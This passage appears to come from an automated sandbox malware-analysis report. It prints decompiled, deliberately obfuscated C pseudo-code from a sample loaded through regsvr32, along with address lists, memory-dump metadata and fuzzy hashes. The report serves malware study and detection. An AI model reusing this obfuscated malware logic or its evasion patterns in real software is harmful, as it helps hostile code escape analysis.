				_v1084 = _v1084 ^ 0xfbfc03d3;
				while(_t264 != 0x45008f) {
					if(_t264 == 0x18af684) {
						E001AC4E5();
						L8:
						_t264 = 0x45008f;
						continue;
					}
					if(_t264 == 0x239027f) {
						_t255 = E001A2263( &_v1040, _v1068, _v1076, _v1128);
						__eflags = 0;
						 *_t255 = 0;
						return E001A35B1(_v1052,  &_v1040, _v1120, _v1060, _v1084);
					}
					if(_t264 == 0x58e823f) {
						_t257 =  *0x1c4c10; // 0x67d820
						__eflags =  *((intOrPtr*)(_t257 + 0x414));
						_t264 =  !=  ? 0xd9adec8 : 0x18af684;
						continue;
					}
					if(_t264 == 0xc8ea48b) {
						E001C1A0A(_v1132, _v1072, _v1096, _v1148,  &_v520);
						_t261 = E001A4B40( &_v520, _v1104, __eflags,  &_v1040, _v1080);
						_t291 =  &(_t291[5]);
						_t264 = 0x239027f;
						continue;
					}
					if(_t264 != 0xd9adec8) {
						L13:
						__eflags = _t264 - 0xa147fec;
						if(__eflags != 0) {
							continue;
						}
						return _t261;
					}
					_t261 = E001BD15E();
					goto L8;
				}
				_push(_v1112);
				_push(0x1a109c);
				_push(_v1124);
				_t248 = E001BF5D9(_v1152, _v1116, __eflags);
				_t266 =  *0x1c4c10; // 0x67d820
				_t221 = _t266 + 4; // 0x67d824
				__eflags = _t266 + 0x20c;
				E001B8EB3(_t221, _t266 + 0x20c, _v1064, _v1152, _v1044,  &_v1040, _v1144, _t248, _v1100);
				E001BF94B(_t248, _v1056, _v1092, _v1136, _v1048);
				_t291 =  &(_t291[0xd]);
				_t264 = 0xc8ea48b;
				goto L13;
			}










































                                                                                                                0x001acde0
                                                                                                                0x001acde6
                                                                                                                0x001acdf0
                                                                                                                0x001acdf5
                                                                                                                0x001ace04
                                                                                                                0x001ace07
                                                                                                                0x001ace0b
                                                                                                                0x001ace13
                                                                                                                0x001ace1b
                                                                                                                0x001ace20
                                                                                                                0x001ace28
                                                                                                                0x001ace2d
                                                                                                                0x001ace35
                                                                                                                0x001ace3d
                                                                                                                0x001ace45
                                                                                                                0x001ace4d
                                                                                                                0x001ace55
                                                                                                                0x001ace5d
                                                                                                                0x001ace62
                                                                                                                0x001ace67
                                                                                                                0x001ace6c
                                                                                                                0x001ace74
                                                                                                                0x001ace81
                                                                                                                0x001ace8a
                                                                                                                0x001ace8e
                                                                                                                0x001ace96
                                                                                                                0x001acea3
                                                                                                                0x001acea7
                                                                                                                0x001aceac
                                                                                                                0x001aceb4
                                                                                                                0x001acebc
                                                                                                                0x001acec9
                                                                                                                0x001acecd
                                                                                                                0x001aced2
                                                                                                                0x001aceda
                                                                                                                0x001acee2
                                                                                                                0x001aceea
                                                                                                                0x001acef2
                                                                                                                0x001acefa
                                                                                                                0x001acf02
                                                                                                                0x001acf0a
                                                                                                                0x001acf17
                                                                                                                0x001acf1b
                                                                                                                0x001acf20
                                                                                                                0x001acf28
                                                                                                                0x001acf30
                                                                                                                0x001acf38
                                                                                                                0x001acf40
                                                                                                                0x001acf45
                                                                                                                0x001acf4d
                                                                                                                0x001acf55
                                                                                                                0x001acf5a
                                                                                                                0x001acf62
                                                                                                                0x001acf6a
                                                                                                                0x001acf6f
                                                                                                                0x001acf77
                                                                                                                0x001acf7f
                                                                                                                0x001acf87
                                                                                                                0x001acf8f
                                                                                                                0x001acf97
                                                                                                                0x001acf9f
                                                                                                                0x001acfa7
                                                                                                                0x001acfb4
                                                                                                                0x001acfb8
                                                                                                                0x001acfc0
                                                                                                                0x001acfc8
                                                                                                                0x001acfd0
                                                                                                                0x001acfd8
                                                                                                                0x001acfe0
                                                                                                                0x001acfea
                                                                                                                0x001acff7
                                                                                                                0x001ad004
                                                                                                                0x001ad011
                                                                                                                0x001ad019
                                                                                                                0x001ad028
                                                                                                                0x001ad029
                                                                                                                0x001ad02d
                                                                                                                0x001ad035
                                                                                                                0x001ad03d
                                                                                                                0x001ad045
                                                                                                                0x001ad04d
                                                                                                                0x001ad055
                                                                                                                0x001ad05d
                                                                                                                0x001ad065
                                                                                                                0x001ad06d
                                                                                                                0x001ad075
                                                                                                                0x001ad082
                                                                                                                0x001ad086
                                                                                                                0x001ad08e
                                                                                                                0x001ad096
                                                                                                                0x001ad09b
                                                                                                                0x001ad0a3
                                                                                                                0x001ad0ab
                                                                                                                0x001ad0b3
                                                                                                                0x001ad0bb
                                                                                                                0x001ad0c9
                                                                                                                0x001ad0cd
                                                                                                                0x001ad0d7
                                                                                                                0x001ad0db
                                                                                                                0x001ad0e3
                                                                                                                0x001ad0eb
                                                                                                                0x001ad0f3
                                                                                                                0x001ad0fb
                                                                                                                0x001ad103
                                                                                                                0x001ad10b
                                                                                                                0x001ad110
                                                                                                                0x001ad118
                                                                                                                0x001ad120
                                                                                                                0x001ad128
                                                                                                                0x001ad12d
                                                                                                                0x001ad135
                                                                                                                0x001ad13d
                                                                                                                0x001ad145
                                                                                                                0x001ad14d
                                                                                                                0x001ad157
                                                                                                                0x001ad1f2
                                                                                                                0x001ad18a
                                                                                                                0x001ad18a
                                                                                                                0x00000000
                                                                                                                0x001ad18a
                                                                                                                0x001ad163
                                                                                                                0x001ad292
                                                                                                                0x001ad29b
                                                                                                                0x001ad2a8
                                                                                                                0x00000000
                                                                                                                0x001ad2bb
                                                                                                                0x001ad16f
                                                                                                                0x001ad1d4
                                                                                                                0x001ad1db
                                                                                                                0x001ad1e2
                                                                                                                0x00000000
                                                                                                                0x001ad1e2
                                                                                                                0x001ad177
                                                                                                                0x001ad1a6
                                                                                                                0x001ad1c2
                                                                                                                0x001ad1c7
                                                                                                                0x001ad1ca
                                                                                                                0x00000000
                                                                                                                0x001ad1ca
                                                                                                                0x001ad17b
                                                                                                                0x001ad271
                                                                                                                0x001ad271
                                                                                                                0x001ad277
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ad277
                                                                                                                0x001ad185
                                                                                                                0x00000000
                                                                                                                0x001ad185
                                                                                                                0x001ad1f9
                                                                                                                0x001ad1fd
                                                                                                                0x001ad202
                                                                                                                0x001ad20e
                                                                                                                0x001ad238
                                                                                                                0x001ad23e
                                                                                                                0x001ad241
                                                                                                                0x001ad247
                                                                                                                0x001ad264
                                                                                                                0x001ad269
                                                                                                                0x001ad26c
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $>$B%T$Fo%
                                                                                                                • API String ID: 0-816726572
                                                                                                                • Opcode ID: 0df44814e7ccc5c14cb1cd2a7c828f0ee2316162a77d8dfb605703c0ac176198
                                                                                                                • Instruction ID: 9a4b189e88f06527d3e0985461ea1b5a30452d4f0fdbd70ce268b1d68936b72e
                                                                                                                • Opcode Fuzzy Hash: 0df44814e7ccc5c14cb1cd2a7c828f0ee2316162a77d8dfb605703c0ac176198
                                                                                                                • Instruction Fuzzy Hash: BBC11DB10083808FC768CF25D58A91FBBF1BBD5748F504A1DF6A696260D3B1CA49CF86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B2783 Relevance: 4.0, Strings: 3, Instructions: 201COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001B2783(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t161;
				void* _t177;
				void* _t178;
				void* _t183;
				void* _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				void* _t192;
				void* _t221;
				void* _t223;
				void* _t224;

				_t220 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t161);
				_v104 = 0xf274f7;
				_t224 = _t223 + 0x18;
				_v104 = _v104 << 1;
				_v104 = _v104 << 4;
				_t221 = 0;
				_v104 = _v104 ^ 0x1e43e0d6;
				_t192 = 0x6023d69;
				_v84 = 0x535c0c;
				_t185 = 0x57;
				_v84 = _v84 / _t185;
				_v84 = _v84 ^ 0x00073351;
				_v108 = 0x11c640;
				_t186 = 0x72;
				_v108 = _v108 * 0x5a;
				_v108 = _v108 + 0x565;
				_v108 = _v108 ^ 0x06349e91;
				_v120 = 0x83f247;
				_v120 = _v120 * 0x6a;
				_v120 = _v120 ^ 0xce6fc75b;
				_v120 = _v120 << 0xa;
				_v120 = _v120 ^ 0x365e4d2d;
				_v124 = 0xf28d99;
				_v124 = _v124 + 0xffff2c6b;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x0001a022;
				_v100 = 0x8b20ab;
				_v100 = _v100 + 0xffff9ff6;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xb02f0bcc;
				_v112 = 0xdcc3b5;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 + 0xffff47e2;
				_v112 = _v112 ^ 0xfff6fb09;
				_v88 = 0xae0fa2;
				_v88 = _v88 * 0x4b;
				_v88 = _v88 ^ 0x32ff48f5;
				_v92 = 0x9ce572;
				_v92 = _v92 / _t186;
				_v92 = _v92 ^ 0x00033cd4;
				_v116 = 0xdf3c17;
				_v116 = _v116 | 0x576f0a38;
				_t187 = 0x24;
				_v116 = _v116 / _t187;
				_v116 = _v116 ^ 0x02769a92;
				_v128 = 0x8c9df7;
				_v128 = _v128 + 0x8c9;
				_v128 = _v128 + 0xb2c5;
				_v128 = _v128 + 0x6261;
				_v128 = _v128 ^ 0x008eac0f;
				_v96 = 0xd8f30c;
				_v96 = _v96 ^ 0x8d261108;
				_v96 = _v96 ^ 0x8df0225d;
				_v72 = 0x9d525a;
				_v72 = _v72 | 0xf0920ac5;
				_v72 = _v72 ^ 0xf09e2456;
				_v76 = 0x4eac0f;
				_t188 = 0x22;
				_v76 = _v76 * 0x70;
				_v76 = _v76 ^ 0x226c3ba3;
				_v80 = 0xaa28e5;
				_v80 = _v80 / _t188;
				_v80 = _v80 ^ 0x0003e0ed;
				_v64 = 0x557db1;
				_v64 = _v64 ^ 0xab82898c;
				_v64 = _v64 ^ 0xabd85123;
				_v68 = 0x6b1311;
				_t189 = 0x2d;
				_v68 = _v68 / _t189;
				_v68 = _v68 ^ 0x000168b9;
				do {
					while(_t192 != 0x2cc8358) {
						if(_t192 == 0x4876999) {
							_t178 = E001B6D3A( &_v60, _t220 + 0x14, _v72, _v76, _v80);
							_t224 = _t224 + 0xc;
							__eflags = _t178;
							if(__eflags != 0) {
								_t192 = 0x555feb3;
								continue;
							}
						} else {
							if(_t192 == 0x555feb3) {
								__eflags = E001AA903(_v64, _t220 + 0x24, __eflags, _v68,  &_v60);
								_t221 =  !=  ? 1 : _t221;
							} else {
								if(_t192 == 0x6023d69) {
									_t192 = 0x628e9a9;
									continue;
								} else {
									if(_t192 == 0x628e9a9) {
										E001A6DD9( &_v60, _v104, _v84, _a8, _v108);
										_t224 = _t224 + 0xc;
										_t192 = 0x2cc8358;
										continue;
									} else {
										if(_t192 == 0x7251359) {
											_t183 = E001B6D3A( &_v60, _t220 + 4, _v112, _v88, _v92);
											_t224 = _t224 + 0xc;
											__eflags = _t183;
											if(__eflags != 0) {
												_t192 = 0xebce7c0;
												continue;
											}
										} else {
											if(_t192 != 0xebce7c0) {
												goto L19;
											} else {
												_t184 = E001B6D3A( &_v60, _t220 + 8, _v116, _v128, _v96);
												_t224 = _t224 + 0xc;
												if(_t184 != 0) {
													_t192 = 0x4876999;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L22:
						return _t221;
					}
					_t177 = E001B6D3A( &_v60, _t220 + 0x1c, _v120, _v124, _v100);
					_t224 = _t224 + 0xc;
					__eflags = _t177;
					if(__eflags == 0) {
						_t192 = 0xf586255;
						goto L19;
					} else {
						_t192 = 0x7251359;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t192 - 0xf586255;
				} while (__eflags != 0);
				goto L22;
			}



































                                                                                                                0x001b278d
                                                                                                                0x001b2794
                                                                                                                0x001b2795
                                                                                                                0x001b279c
                                                                                                                0x001b27a3
                                                                                                                0x001b27aa
                                                                                                                0x001b27ab
                                                                                                                0x001b27ac
                                                                                                                0x001b27b1
                                                                                                                0x001b27b9
                                                                                                                0x001b27bc
                                                                                                                0x001b27c2
                                                                                                                0x001b27c7
                                                                                                                0x001b27c9
                                                                                                                0x001b27d1
                                                                                                                0x001b27d6
                                                                                                                0x001b27e4
                                                                                                                0x001b27e9
                                                                                                                0x001b27ef
                                                                                                                0x001b27f7
                                                                                                                0x001b2804
                                                                                                                0x001b2807
                                                                                                                0x001b280b
                                                                                                                0x001b2813
                                                                                                                0x001b281b
                                                                                                                0x001b2828
                                                                                                                0x001b282c
                                                                                                                0x001b2834
                                                                                                                0x001b2839
                                                                                                                0x001b2841
                                                                                                                0x001b2849
                                                                                                                0x001b2851
                                                                                                                0x001b2856
                                                                                                                0x001b285b
                                                                                                                0x001b2863
                                                                                                                0x001b286b
                                                                                                                0x001b2873
                                                                                                                0x001b2878
                                                                                                                0x001b2880
                                                                                                                0x001b2888
                                                                                                                0x001b288d
                                                                                                                0x001b2895
                                                                                                                0x001b289d
                                                                                                                0x001b28aa
                                                                                                                0x001b28ae
                                                                                                                0x001b28b6
                                                                                                                0x001b28c6
                                                                                                                0x001b28ca
                                                                                                                0x001b28d2
                                                                                                                0x001b28da
                                                                                                                0x001b28e6
                                                                                                                0x001b28e9
                                                                                                                0x001b28ed
                                                                                                                0x001b28f5
                                                                                                                0x001b28fd
                                                                                                                0x001b2905
                                                                                                                0x001b290d
                                                                                                                0x001b2915
                                                                                                                0x001b291d
                                                                                                                0x001b2925
                                                                                                                0x001b292d
                                                                                                                0x001b2935
                                                                                                                0x001b293d
                                                                                                                0x001b2947
                                                                                                                0x001b2954
                                                                                                                0x001b2963
                                                                                                                0x001b2966
                                                                                                                0x001b296a
                                                                                                                0x001b2972
                                                                                                                0x001b2982
                                                                                                                0x001b2986
                                                                                                                0x001b298e
                                                                                                                0x001b2996
                                                                                                                0x001b299e
                                                                                                                0x001b29a6
                                                                                                                0x001b29b2
                                                                                                                0x001b29ba
                                                                                                                0x001b29be
                                                                                                                0x001b29c6
                                                                                                                0x001b29c6
                                                                                                                0x001b29d4
                                                                                                                0x001b2aa4
                                                                                                                0x001b2aa9
                                                                                                                0x001b2aac
                                                                                                                0x001b2aae
                                                                                                                0x001b2ab0
                                                                                                                0x00000000
                                                                                                                0x001b2ab0
                                                                                                                0x001b29da
                                                                                                                0x001b29dc
                                                                                                                0x001b2b0d
                                                                                                                0x001b2b0f
                                                                                                                0x001b29e2
                                                                                                                0x001b29e8
                                                                                                                0x001b2a87
                                                                                                                0x00000000
                                                                                                                0x001b29ee
                                                                                                                0x001b29f4
                                                                                                                0x001b2a75
                                                                                                                0x001b2a7a
                                                                                                                0x001b2a7d
                                                                                                                0x00000000
                                                                                                                0x001b29f6
                                                                                                                0x001b29fc
                                                                                                                0x001b2a44
                                                                                                                0x001b2a49
                                                                                                                0x001b2a4c
                                                                                                                0x001b2a4e
                                                                                                                0x001b2a54
                                                                                                                0x00000000
                                                                                                                0x001b2a54
                                                                                                                0x001b29fe
                                                                                                                0x001b2a04
                                                                                                                0x00000000
                                                                                                                0x001b2a0a
                                                                                                                0x001b2a1d
                                                                                                                0x001b2a22
                                                                                                                0x001b2a27
                                                                                                                0x001b2a2d
                                                                                                                0x00000000
                                                                                                                0x001b2a2d
                                                                                                                0x001b2a27
                                                                                                                0x001b2a04
                                                                                                                0x001b29fc
                                                                                                                0x001b29f4
                                                                                                                0x001b29e8
                                                                                                                0x001b29dc
                                                                                                                0x001b2b13
                                                                                                                0x001b2b1e
                                                                                                                0x001b2b1e
                                                                                                                0x001b2aca
                                                                                                                0x001b2acf
                                                                                                                0x001b2ad2
                                                                                                                0x001b2ad4
                                                                                                                0x001b2ae0
                                                                                                                0x00000000
                                                                                                                0x001b2ad6
                                                                                                                0x001b2ad6
                                                                                                                0x00000000
                                                                                                                0x001b2ad6
                                                                                                                0x00000000
                                                                                                                0x001b2ae5
                                                                                                                0x001b2ae5
                                                                                                                0x001b2ae5
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -M^6$8oW$ab
                                                                                                                • API String ID: 0-4042031332
                                                                                                                • Opcode ID: a5f24092e32d3a9c857a4c2ab682468fe3bfb63a33d7ffcafa9aec599312b2c7
                                                                                                                • Instruction ID: 018b331227655f408ed6133ddb68672c5c8abe294bb4c1b50ae0399ee16c168a
                                                                                                                • Opcode Fuzzy Hash: a5f24092e32d3a9c857a4c2ab682468fe3bfb63a33d7ffcafa9aec599312b2c7
                                                                                                                • Instruction Fuzzy Hash: 3E9154726083419FC728CE61D98995BBBF1FFD9348F008A1DF28A96160D7B69949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A22F7 Relevance: 3.9, Strings: 3, Instructions: 191COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001A22F7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				void* _t186;
				void* _t199;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				void* _t214;
				intOrPtr* _t224;
				void* _t225;
				signed int* _t228;

				_t224 = _a12;
				_push(_t224);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t186);
				_v76 = 0x6b366a;
				_t228 =  &(( &_v84)[5]);
				_v76 = _v76 ^ 0xf8a36b54;
				_t225 = 0;
				_t214 = 0x6b2b265;
				_t209 = 0x34;
				_v76 = _v76 / _t209;
				_v76 = _v76 | 0xa2838ae8;
				_v76 = _v76 ^ 0xa6cbcefe;
				_v64 = 0xfffd08;
				_v64 = _v64 >> 0x10;
				_t210 = 0x4b;
				_v64 = _v64 / _t210;
				_v64 = _v64 + 0xffff27e0;
				_v64 = _v64 ^ 0xffff27e2;
				_v68 = 0x419b1a;
				_v68 = _v68 ^ 0x0348e9e4;
				_v68 = _v68 >> 2;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x000c10b3;
				_v72 = 0xff6b59;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0xffffc17e;
				_v72 = _v72 | 0x099bbe29;
				_v72 = _v72 ^ 0xffd39c09;
				_v40 = 0xa8a094;
				_v40 = _v40 ^ 0x7504fee3;
				_v40 = _v40 + 0xe5f3;
				_v40 = _v40 ^ 0x75ab03fd;
				_v44 = 0x504f8c;
				_v44 = _v44 * 0xb;
				_v44 = _v44 + 0xffff13d3;
				_v44 = _v44 ^ 0x03755fa7;
				_v20 = 0x2acde5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x66f293ff;
				_v48 = 0x2bc8a7;
				_v48 = _v48 * 0x21;
				_v48 = _v48 ^ 0xb0a3a5ff;
				_v48 = _v48 ^ 0xb50b43f1;
				_v24 = 0x4818c;
				_v24 = _v24 + 0x60d4;
				_v24 = _v24 ^ 0x0006e672;
				_v28 = 0x92aa11;
				_v28 = _v28 ^ 0x8e9633f1;
				_v28 = _v28 ^ 0x8e0fb8f6;
				_v52 = 0x252bf6;
				_v52 = _v52 + 0xffff72f9;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x0c02cf27;
				_v80 = 0xf20005;
				_v80 = _v80 << 9;
				_v80 = _v80 << 0xd;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x0003858a;
				_v84 = 0xaaefd4;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 + 0x451d;
				_v84 = _v84 ^ 0x38fc3a4f;
				_v84 = _v84 ^ 0x38f9ba66;
				_v32 = 0x294fa8;
				_v32 = _v32 | 0x4aa84213;
				_v32 = _v32 + 0xfffff9bc;
				_v32 = _v32 ^ 0x4aac717f;
				_v8 = 0xffc0ee;
				_v8 = _v8 + 0xffffd934;
				_v8 = _v8 ^ 0x00ff695a;
				_v12 = 0xfdb7ff;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 ^ 0x000f0236;
				_v16 = 0x7cf3c2;
				_t211 = 7;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x18e6a16f;
				_v56 = 0x317d8c;
				_v56 = _v56 / _t211;
				_v56 = _v56 + 0xffffd5b8;
				_v56 = _v56 + 0xd560;
				_v56 = _v56 ^ 0x000544d4;
				_v60 = 0x93a3ef;
				_v60 = _v60 ^ 0x41c14663;
				_v60 = _v60 | 0x255ce750;
				_v60 = _v60 >> 0xb;
				_v60 = _v60 ^ 0x000dfc69;
				_v36 = 0xed38e6;
				_v36 = _v36 | 0x2530daf4;
				_v36 = _v36 + 0x9b1d;
				_v36 = _v36 ^ 0x25ff03de;
				do {
					while(_t214 != 0x3b804d2) {
						if(_t214 == 0x508e570) {
							_push(_t214);
							_t225 = E001A303A(_t214, _v4);
							_t228 =  &(_t228[3]);
							if(_t225 != 0) {
								_t214 = 0xbee7f87;
								continue;
							}
						} else {
							if(_t214 == 0x6b2b265) {
								_t214 = 0x3b804d2;
								continue;
							} else {
								if(_t214 != 0xbee7f87) {
									goto L13;
								} else {
									E001B0430(_t214, _t225, _v32, _v8, _v12, _v16,  &_v4, _a4, _t214, _t214, _v56, _v60, _v64, _v36);
									 *_t224 = _v4;
								}
							}
						}
						L6:
						return _t225;
					}
					_t199 = E001B0430(_t214, 0, _v68, _v72, _v40, _v44,  &_v4, _a4, _t214, _t214, _v20, _v48, _v76, _v24);
					_t228 =  &(_t228[0xc]);
					if(_t199 == 0) {
						_t214 = 0x6ca5714;
						goto L13;
					} else {
						_t214 = 0x508e570;
						continue;
					}
					goto L6;
					L13:
				} while (_t214 != 0x6ca5714);
				goto L6;
			}

































                                                                                                                0x001a22fe
                                                                                                                0x001a2302
                                                                                                                0x001a2303
                                                                                                                0x001a2307
                                                                                                                0x001a230b
                                                                                                                0x001a230c
                                                                                                                0x001a230d
                                                                                                                0x001a2312
                                                                                                                0x001a231a
                                                                                                                0x001a231d
                                                                                                                0x001a232b
                                                                                                                0x001a232d
                                                                                                                0x001a2334
                                                                                                                0x001a2339
                                                                                                                0x001a233f
                                                                                                                0x001a2347
                                                                                                                0x001a234f
                                                                                                                0x001a2357
                                                                                                                0x001a2360
                                                                                                                0x001a2363
                                                                                                                0x001a2367
                                                                                                                0x001a236f
                                                                                                                0x001a2377
                                                                                                                0x001a237f
                                                                                                                0x001a2387
                                                                                                                0x001a238c
                                                                                                                0x001a2391
                                                                                                                0x001a2399
                                                                                                                0x001a23a1
                                                                                                                0x001a23a6
                                                                                                                0x001a23ae
                                                                                                                0x001a23b6
                                                                                                                0x001a23be
                                                                                                                0x001a23c6
                                                                                                                0x001a23ce
                                                                                                                0x001a23d6
                                                                                                                0x001a23de
                                                                                                                0x001a23eb
                                                                                                                0x001a23ef
                                                                                                                0x001a23f7
                                                                                                                0x001a23ff
                                                                                                                0x001a2407
                                                                                                                0x001a240c
                                                                                                                0x001a2414
                                                                                                                0x001a2421
                                                                                                                0x001a2425
                                                                                                                0x001a242d
                                                                                                                0x001a2435
                                                                                                                0x001a243d
                                                                                                                0x001a2445
                                                                                                                0x001a244d
                                                                                                                0x001a2455
                                                                                                                0x001a245d
                                                                                                                0x001a2465
                                                                                                                0x001a246d
                                                                                                                0x001a247a
                                                                                                                0x001a247e
                                                                                                                0x001a2486
                                                                                                                0x001a248e
                                                                                                                0x001a2493
                                                                                                                0x001a2498
                                                                                                                0x001a249d
                                                                                                                0x001a24a5
                                                                                                                0x001a24ad
                                                                                                                0x001a24b2
                                                                                                                0x001a24ba
                                                                                                                0x001a24c2
                                                                                                                0x001a24cc
                                                                                                                0x001a24d9
                                                                                                                0x001a24e1
                                                                                                                0x001a24e9
                                                                                                                0x001a24f1
                                                                                                                0x001a24f9
                                                                                                                0x001a2501
                                                                                                                0x001a2509
                                                                                                                0x001a2511
                                                                                                                0x001a2516
                                                                                                                0x001a251e
                                                                                                                0x001a252d
                                                                                                                0x001a252e
                                                                                                                0x001a2532
                                                                                                                0x001a253a
                                                                                                                0x001a254d
                                                                                                                0x001a2551
                                                                                                                0x001a2559
                                                                                                                0x001a2561
                                                                                                                0x001a2569
                                                                                                                0x001a2571
                                                                                                                0x001a2579
                                                                                                                0x001a2581
                                                                                                                0x001a2586
                                                                                                                0x001a258e
                                                                                                                0x001a2596
                                                                                                                0x001a259e
                                                                                                                0x001a25a6
                                                                                                                0x001a25ae
                                                                                                                0x001a25ae
                                                                                                                0x001a25b8
                                                                                                                0x001a2630
                                                                                                                0x001a263b
                                                                                                                0x001a263d
                                                                                                                0x001a2642
                                                                                                                0x001a2644
                                                                                                                0x00000000
                                                                                                                0x001a2644
                                                                                                                0x001a25ba
                                                                                                                0x001a25c0
                                                                                                                0x001a261c
                                                                                                                0x00000000
                                                                                                                0x001a25c2
                                                                                                                0x001a25c8
                                                                                                                0x00000000
                                                                                                                0x001a25ce
                                                                                                                0x001a2601
                                                                                                                0x001a2610
                                                                                                                0x001a2610
                                                                                                                0x001a25c8
                                                                                                                0x001a25c0
                                                                                                                0x001a2613
                                                                                                                0x001a261b
                                                                                                                0x001a261b
                                                                                                                0x001a267e
                                                                                                                0x001a2683
                                                                                                                0x001a2688
                                                                                                                0x001a2691
                                                                                                                0x00000000
                                                                                                                0x001a268a
                                                                                                                0x001a268a
                                                                                                                0x00000000
                                                                                                                0x001a268a
                                                                                                                0x00000000
                                                                                                                0x001a2696
                                                                                                                0x001a2696
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: P\%$j6k$8
                                                                                                                • API String ID: 0-3665046756
                                                                                                                • Opcode ID: 87e90175376fd117733453265d6c76854319db59a287c61951172c501d175640
                                                                                                                • Instruction ID: d347bbc47e3879296f7827c4b0b864b57af9189453a914f61b61ddfa41ffba6f
                                                                                                                • Opcode Fuzzy Hash: 87e90175376fd117733453265d6c76854319db59a287c61951172c501d175640
                                                                                                                • Instruction Fuzzy Hash: FF911EB14083819FC398CF65C98A81FFBF1FB85748F505A1DF69696220D3B68A19DF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BD15E Relevance: 3.9, Strings: 3, Instructions: 186COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001BD15E() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t145;
				signed int _t146;
				void* _t153;
				void* _t175;
				void* _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr _t185;
				intOrPtr* _t186;
				signed int _t187;
				signed int* _t188;

				_t188 =  &_v64;
				_v52 = 0xa0848e;
				_v52 = _v52 >> 3;
				_t153 = 0x6541371;
				_v52 = _v52 + 0xffffb584;
				_v52 = _v52 ^ 0x0012c615;
				_v16 = 0xc722ac;
				_v16 = _v16 + 0xffff1b68;
				_v16 = _v16 ^ 0x00c93e2b;
				_v8 = 0x24c0a1;
				_v8 = _v8 >> 9;
